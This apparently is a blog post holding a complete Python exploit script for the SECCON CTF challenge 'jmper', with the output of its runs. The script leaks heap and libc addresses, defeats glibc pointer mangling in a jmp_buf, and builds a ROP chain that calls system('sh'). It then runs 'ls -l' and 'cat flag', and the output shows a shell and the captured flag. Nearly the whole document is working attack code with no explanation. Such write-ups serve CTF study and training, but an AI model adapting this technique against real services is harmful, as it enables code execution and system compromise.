pwn3r tistory

jmper

#!/usr/bin/python

from socket import *

from struct import pack, unpack

import time

def rc(s, ch):

    res = ''

    while ch not in res:

        res += s.recv(1)

    return res

#def ror64(value, count):

def ROR(data, shift, size=64):

    shift %= size

    body = data >> shift

    remains = (data << (size - shift)) - (body << size)

    return (body + remains)

p = lambda x : pack("<Q", x)

up = lambda x : unpack("<Q", x)[0]

HOST = '127.0.0.1'

PORT = 9999

HOST = 'jmper.pwn.seccon.jp'

PORT = 5656

libc_start_main_got = 0x601FB0

def add_student(s):

    s.send('1\n')

def name_student(s, idx, name):

    s.send('2\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    rc(s, 'Input name:')

    s.send(name)

def memo_student(s, idx, memo):

    s.send('3\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    rc(s, 'Input memo:')

    s.send(memo)

def show_name(s, idx):

    s.send('4\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    return rc(s, '1. Add')[:-6]

def show_memo(s, idx):

    s.send('5\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    return rc(s, '1. Add')[:-6]

s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

raw_input(">>")

rc(s, '6. Bye :)\n')

add_student(s)  # 0

rc(s, '6. Bye :)\n')

add_student(s)  # 0

rc(s, '6. Bye :)\n')

memo_student(s, 0, 'a'*32 + '\x08')

rc(s, '6. Bye :)\n')

heap_leak = up(show_name(s, 0).ljust(8, '\x00'))

print 'heap leak : ', hex(heap_leak)

jmp_buf = heap_leak - 0xf8 + 0x30 #(rsp, rip)

rc(s, '6. Bye :)\n')

memo_student(s, 0, 'a'*32 + '\x78')

rc(s, '6. Bye :)\n')

name_student(s, 0, p(jmp_buf)+'\n')

rc(s, '6. Bye :)\n')

rsp_rip = show_name(s, 1)[:16]

rsp = up(rsp_rip[:8])

rip = up(rsp_rip[8:])

fs_val = ROR(rip, 0x11, 64) ^ 0x0400C31

rsp = ROR(rsp, 0x11, 64) ^ fs_val

print 'rsp : ', hex(rsp)

# ror 0x11 ^ fs[0x30]

rc(s, '6. Bye :)\n')

name_student(s, 0, p(libc_start_main_got)+'\n')

rc(s, '6. Bye :)\n')

libc_start_main_libc = up(show_name(s, 1)[:8].ljust(8, '\x00'))

libc_base = libc_start_main_libc - 0x000000000021e50

system_libc = libc_base + 0x0000000000046590

pop_rdi = libc_base + 0x0000000000022b9a

# 0000000000046590 <__libc_system@@GLIBC_PRIVATE>:

# 0000000000021e50 <__libc_start_main@@GLIBC_2.2.5>:

# 0000000000022b9a : pop rdi ; ret

print 'libc_start_main_libc : ', hex(libc_start_main_libc)

print 'system_libc : ', hex(system_libc)

payload =''

payload += p(pop_rdi)

payload += p(heap_leak+0x50)

payload += p(system_libc)

# overwrite ret

rc(s, '6. Bye :)\n')

name_student(s, 0, p(rsp + 0x18)+'\n')

rc(s, '6. Bye :)\n')

name_student(s, 1, payload+'\n')

# for arg "sh"

rc(s, '6. Bye :)\n')

memo_student(s, 1, "sh"+'\n')

for i in range(0, 29 - 2):

    rc(s, '6. Bye :)\n')

    add_student(s)  # 0

time.sleep(0.1)

s.send('ls -l\n')

time.sleep(0.1)

raw_input('> ')

print s.recv(1024)

s.send('cat flag\n')

raw_input('> ')

print s.recv(1024)

s.close()

"""

    pwn3r$ python jmper_exploit.py

    >>

    heap leak :  0x239a208

    rsp :  0x7ffe73389820L

    libc_start_main_libc :  0x7fcf6c59ee50

    system_libc :  0x7fcf6c5c3590

    >

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    Exception has occurred. Jump!

    Nice jump! Bye :)

    total 20

    -r--r--r-- 1 root root    32 Dec  8 16:20 flag

    -rwxr-xr-x 1 root root 13044 Dec  8 15:30 jmper

    >

    Traceback (most recent call last):

    File "jmper_exploit.py", line 138, in <module>

    print s.recv(1024)

    pwn3r$ python jmper_exploit.py

    >>

    heap leak :  0x78e208

    rsp :  0x7ffd5c7655e0L

    libc_start_main_libc :  0x7f6915ae2e50

    system_libc :  0x7f6915b07590

    > 

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    Exception has occurred. Jump!

    Nice jump! Bye :)

    > 

    SECCON{3nj0y_my_jmp1n9_serv1ce}

"""